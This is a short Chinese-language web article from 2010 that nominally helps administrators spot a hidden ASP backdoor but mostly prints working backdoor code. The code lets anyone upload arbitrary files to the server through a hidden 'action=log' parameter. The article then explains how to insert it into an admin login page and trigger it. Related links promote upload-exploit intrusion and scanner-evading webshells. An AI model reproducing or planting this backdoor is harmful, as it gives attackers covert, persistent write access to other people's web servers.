隱蔽的ASP后門 大家可以查看下
更新時(shí)間:2010年08月04日 13:07:03 作者:
這段代碼可以隱藏在asp文件中,大家可以搜索一些特點(diǎn)的關(guān)鍵字,查看文件的修改日期,看看是不是有如下的代碼。
復(fù)制代碼 代碼如下:
<%if request.QueryString("action")="log" then
a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-3:h.Position=0:h.type=2:h.CharSet="BIG5":i=h.Readtext:h.close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h.Type=1:h.Open:c.Position=k-1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form>
<%end if%>
比如編輯在“admin_login.asp”下
以后只需要輸入“admin_login.asp?action=log”即可
相關(guān)文章
實(shí)例分析ASP上傳漏洞入侵實(shí)戰(zhàn)及擴(kuò)展
實(shí)例分析ASP上傳漏洞入侵實(shí)戰(zhàn)及擴(kuò)展...2006-09-09利用Microsoft.XMLHTTP控件發(fā)送COOKIE
利用Microsoft.XMLHTTP控件發(fā)送COOKIE...2006-09-09一個(gè)較新的ASP后門服務(wù)端實(shí)現(xiàn)代碼
一直很奇怪,為什么客戶端里面不是eval,就是execute,不管我藏哪里,管理員用個(gè)什么XX webshell掃描器,就能踢我屁股了。2010-10-10